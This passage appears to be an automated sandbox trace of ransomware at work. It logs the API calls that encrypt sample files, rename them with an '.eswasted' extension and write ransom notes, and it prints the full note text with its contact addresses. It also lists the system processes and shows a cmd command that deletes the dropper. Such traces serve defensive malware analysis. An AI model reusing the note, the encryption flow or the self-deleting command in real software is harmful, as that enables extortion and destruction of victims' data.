KEY:\r\n[begin_key]bvZOCUFHqwxNsM0PPHDgz2vLQCs/GHkjSRDp1dKMLiLz2d3P2KG5pgbQZJ2x3O37\r\nsMRFQlxeGfeW00PUIhmSxxjTXZlSx+c2PsaVqiFCBEB2Qm6tpFiDZl6K81sgHgBj\r\nn4le9gdGsm8vBKwcFDtlUZ4j6RJIf0vkkFxfZfk2N5aMp8nZ8WBl30XKzB7xqSTG\r\n8yoSl7r5iNL4MJpHQV3fkEX/C4MCVV1ohTM81pEx20cBKKYUILYVX/QNuNJCUHuR\r\nkuRGwHzR2s7yr7AC+qK6r19t6cqChXg2B8qQdVV/FSaKvpTZ7tOzMwEfmRSvkxJM\r\nnFW8ev8Mg/d/Hy5xRdZp0Osn4YDvDibZ5Wv2xOVWaGqvnnvluVEXkZdFjpfiB5dP\r\nF5hf3jLCH5XOM4E9Jaiof2oXvphq5EY5fcUVG9dyskjwPh7WbrnbBR7PjGw2of8Y\r\npgPUB9w71exRmh9qr+l/Gdqto+q7AW6Dq2jjJEIDD5aHqTLvQsEFlgQHmUhOKNkH\r\nmJ5R9zxEKQKGC0nowkw0Swc3thJwOeUURcYIvk/QwqIEU4K8NKXYD+MKsvPrACcF\r\nUo07hVoWKtfBIzxsMlOufk3IhKC/WqEz+yfMt7U7DCDEvts/SHALeUbuHevkGQGD\r\nqroktE0SUcDYn9ICdi6tIyDI9/a1lO1Gylpg2kxNWaF=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.385] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.386] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0085.386] SetEndOfFile (hFile=0x118) returned 1 [0085.388] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.388] CloseHandle (hObject=0x118) returned 1 [0085.388] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.389] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfcc8 | out: hHeap=0x4a0000) returned 1 [0085.389] _aulldvrm () returned 0x0 [0085.389] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0085.390] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0085.390] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.390] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg") returned 55 [0085.390] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4d91a8 [0085.390] lstrcpyW (in: lpString1=0x4d9216, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.390] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0085.390] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0085.391] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0085.391] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0085.392] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0085.393] SetEndOfFile (hFile=0x118) returned 1 [0085.393] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.394] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.394] lstrcpyW (in: lpString1=0x4d9216, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted")) returned 1 [0085.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0085.395] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0085.395] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x97958 [0085.395] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x97958) returned 0x1220000 [0085.395] CloseHandle (hObject=0xfc) returned 1 [0085.456] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0085.462] CloseHandle (hObject=0x100) returned 1 [0085.462] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea260 [0085.462] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0085.463] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a8 | out: pbBuffer=0x4ea2a8) returned 1 [0085.463] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.463] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0085.463] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0085.463] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea468 [0085.472] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.472] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tQvVHL3TliShs55F/oZ5bcUvC5+pXK6vmR3ZR5FFoHjrVrcbaDkbxcB4/rew/D7V\r\ndZn76Ag1uuZGATMr7w66oQxb/5e5qCEgXo7W8GIvmnpy2W8OiaXQ2X428/jH4JHO\r\nRTG1yDBFUA7PnLrM8wQKNT+Iy9thVQgi3nM3VDOSR2oOnLkD6laeWKH+Qrh16VII\r\nWpHorHEdwKwSqBoB7gpVH4w+5yrcWRxFx8Ni0yWCIn/dksKuaj0ZKmI0bgjHwvLG\r\nqLAf3R5ttYzXxXr7h9OW9Wpavh3YxwaZUsX/0YMLDOqlWZVKrkBN3JID1wB8Y4dt\r\nwWDLe48i1rZTg4jjrxaYGyWh1Ojyyp8pzB8xqSQ+0dygaWiTnEB3nvIZsVpIptjO\r\nVfyxt3XdhRmRQ/rZiVVRonrgvP9xFSWmjErTnTM1JiLqH1TSULru5AQ230Ie//L/\r\nJutwdpwo+rJj0sjUqSi2wQ9ez18q+InUms51+LPkEu7KlrZpDY+AGStA7jrqZL69\r\nQCgfe7hUagXQupwI04aLrc+gVWH7dY5DXGBt5TMjCCzJO22JyVGZzaEHO5hhqXnY\r\nEXBoN9EjZe291Mdv7M4Zp2VG0U2QS5m9oRru4DrRRt/em1wPZMTMe1W5KEKofl8j\r\nb/luaZj1d62SAwycbCYgx+kKo0WvYPRyJvT0uTD1p1T=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.472] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea468 | out: hHeap=0x4a0000) returned 1 [0085.472] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0085.473] SetEndOfFile (hFile=0x118) returned 1 [0085.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.475] CloseHandle (hObject=0x118) returned 1 [0085.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.475] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfd90 | out: hHeap=0x4a0000) returned 1 [0085.475] _aulldvrm () returned 0x0 [0085.475] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0085.476] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0085.476] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.476] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0085.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29e) returned 0x4cb238 [0085.476] lstrcpyW (in: lpString1=0x4cb2cc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea260 [0085.476] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0085.477] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea260 | out: pbBuffer=0x4ea260) returned 1 [0085.477] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted_info" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0085.490] WriteFile (in: hFile=0x118, lpBuffer=0x4ea260*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea260*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0085.491] SetEndOfFile (hFile=0x118) returned 1 [0085.491] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.491] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.491] lstrcpyW (in: lpString1=0x4cb2cc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted")) returned 1 [0085.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.eswasted" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0085.492] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0085.493] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x940000 [0085.493] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x940000) returned 0x1380000 [0085.493] CloseHandle (hObject=0x100) returned 1 [0094.916] UnmapViewOfFile (lpBaseAddress=0x1380000) returned 1 [0095.020] CloseHandle (hObject=0x120) returned 1 [0095.026] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4e9fd8 [0095.027] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0095.029] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea020 | out: pbBuffer=0x4ea020) returned 1 [0095.030] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0095.030] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0095.031] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0095.031] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0095.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea1e0 [0095.040] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0095.040] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0095.040] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]EN3mjLjyf8XxoZlt6w6W+x32oTSL9I5RB6JF7NjFhES6Tg9JnPptfs5OfxCVUMY9\r\n+kVdi/JtosJYuQRCtZkn6PiTVsfKGgmQZAMe4uYeoTokEFfVsnehtxpjfQye5cAU\r\nMI0EMQYgooEi2WWrLg1SeTnjQ8UB2F7mrGg8SPiWTC1I1L+pe29kzXuJKlPZRFBM\r\nT+YShnLg2zmR8MeDnqh+CRYj+BdH1k0h3sb49xlYIQEZn662i8Y4n4tKEixXs8vO\r\nUo9WO9PyMtb5E9XYNIbe061YjROCMbLdjNGzRfpTNBUtmrtORf/K6vlH7Hk7saW/\r\nBp4tKfwSU96KMGFQ5AL1NqOEsXs2cCgMxpEwPyyZsL+R5Tjr0F7WLTjGHmUs578p\r\nT6rRZID5jXbGDwwQV0zyXO/NHOALz9E2QFkhcZYHGKM+aVXVugZHhqAlJnCKpTnh\r\nLeRoUKNeskjG2jlnaNTAP7RkLKNk33bu1+348w6kj6KZDZ7eASWBgJJJD5zcmtC6\r\nm1CPgAVfMUKHubnXrEPRT+zoBImPD60aBijmjhigssfAR81Hu3F1xMvc9EbqQDl3\r\nnll25FKQtELRMtaYxigZu4bxJS6YPBkFcPCFPcnPLklLaAVR5bGop8zGFb4/v9/8\r\n8OTocyHsAo0eW8XeMc92kSco9DsJLFwk3Z04O+uXEhi=[end_key]\r\nKEEP IT\r\n") returned 990 [0095.040] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea1e0 | out: hHeap=0x4a0000) returned 1 [0095.040] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0095.040] SetEndOfFile (hFile=0x118) returned 1 [0095.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0095.051] CloseHandle (hObject=0x118) returned 1 [0095.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cb238 | out: hHeap=0x4a0000) returned 1 [0095.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ec8 | out: hHeap=0x4a0000) returned 1 [0095.052] WaitForMultipleObjects (nCount=0x2, lpHandles=0x121ff80*=0xec, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 Process: id = "23" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x38a95000" os_pid = "0x734" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 335 os_tid = 0x99c Thread: id = 337 os_tid = 0x9cc Thread: id = 338 os_tid = 0x95c Thread: id = 339 os_tid = 0x98c Thread: id = 340 os_tid = 0x91c Thread: id = 341 os_tid = 0x90c Thread: id = 342 os_tid = 0x5c4 Process: id = "24" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x38a43000" os_pid = "0x88c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00061d0f" [0xc000000f], "LOCAL" [0x7] Thread: id = 343 os_tid = 0x8cc Thread: id = 344 os_tid = 0x6a8 Thread: id = 345 os_tid = 0xa84 Thread: id = 346 os_tid = 0x8fc Thread: id = 347 os_tid = 0x3a4 Thread: id = 373 os_tid = 0x938 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x36849000" os_pid = "0x618" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:00066647" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 348 os_tid = 0x7e0 Thread: id = 349 os_tid = 0xb08 Thread: id = 350 os_tid = 0xb48 Thread: id = 362 os_tid = 0x694 Process: id = "26" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x36508000" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0x60b16000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1ac" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 353 os_tid = 0x5f4 Thread: id = 354 os_tid = 0xb34 Thread: id = 355 os_tid = 0x664 Thread: id = 356 os_tid = 0xb38 Thread: id = 357 os_tid = 0xb44 Thread: id = 358 os_tid = 0x6c0 Thread: id = 359 os_tid = 0x6dc Thread: id = 360 os_tid = 0x318 Thread: id = 361 os_tid = 0x5e4 Process: id = "27" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x3cee000" os_pid = "0x25c" os_integrity_level = "0x4000" os_privileges = "0x860b14080" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x178" cmd_line = "\"LogonUI.exe\" /flags:0x1" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 394 os_tid = 0x5c4 Thread: id = 395 os_tid = 0x8bc Thread: id = 396 os_tid = 0x6d8 Thread: id = 397 os_tid = 0xa5c Thread: id = 398 os_tid = 0xa1c Thread: id = 399 os_tid = 0xa3c Thread: id = 400 os_tid = 0xac0 Thread: id = 401 os_tid = 0x9fc Thread: id = 402 os_tid = 0xbb0 Process: id = "28" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xba03000" os_pid = "0xa4c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x9dc" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" & del \"C:\\Windows\\SysWOW64\\Pipe.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 405 os_tid = 0x24c [0100.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3bfb9c | out: lpSystemTimeAsFileTime=0x3bfb9c*(dwLowDateTime=0xdbf496a0, dwHighDateTime=0x1d64ac6)) [0100.627] GetCurrentProcessId () returned 0xa4c [0100.627] GetCurrentThreadId () returned 0x24c [0100.627] GetTickCount () returned 0x115276f [0100.627] QueryPerformanceCounter (in: lpPerformanceCount=0x3bfb94 | out: lpPerformanceCount=0x3bfb94*=22137292752) returned 1 [0100.628] GetModuleHandleA (lpModuleName=0x0) returned 0x49fe0000 [0100.628] __set_app_type (_Type=0x1) [0100.628] __p__fmode () returned 0x770331f4 [0100.630] __p__commode () returned 0x770331fc [0100.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0021a6) returned 0x0 [0100.630] __getmainargs (in: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c, _DoWildCard=0, _StartInfo=0x4a004140 | out: _Argc=0x4a004238, _Argv=0x4a004240, _Env=0x4a00423c) returned 0 [0100.630] GetCurrentThreadId () returned 0x24c [0100.630] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x24c) returned 0x60 [0100.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0100.631] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0100.631] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.631] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.632] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3bfb2c | out: phkResult=0x3bfb2c*=0x0) returned 0x2 [0100.632] VirtualQuery (in: lpAddress=0x3bfb63, lpBuffer=0x3bfafc, dwLength=0x1c | out: lpBuffer=0x3bfafc*(BaseAddress=0x3bf000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.632] VirtualQuery (in: lpAddress=0x2c0000, lpBuffer=0x3bfafc, dwLength=0x1c | out: lpBuffer=0x3bfafc*(BaseAddress=0x2c0000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0100.632] VirtualQuery (in: lpAddress=0x2c1000, lpBuffer=0x3bfafc, dwLength=0x1c | out: lpBuffer=0x3bfafc*(BaseAddress=0x2c1000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0100.632] VirtualQuery (in: lpAddress=0x2c3000, lpBuffer=0x3bfafc, dwLength=0x1c | out: lpBuffer=0x3bfafc*(BaseAddress=0x2c3000, AllocationBase=0x2c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0100.632] VirtualQuery (in: lpAddress=0x3c0000, lpBuffer=0x3bfafc, dwLength=0x1c | out: lpBuffer=0x3bfafc*(BaseAddress=0x3c0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x140000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0100.632] GetConsoleOutputCP () returned 0x1b5 [0100.632] GetCPInfo 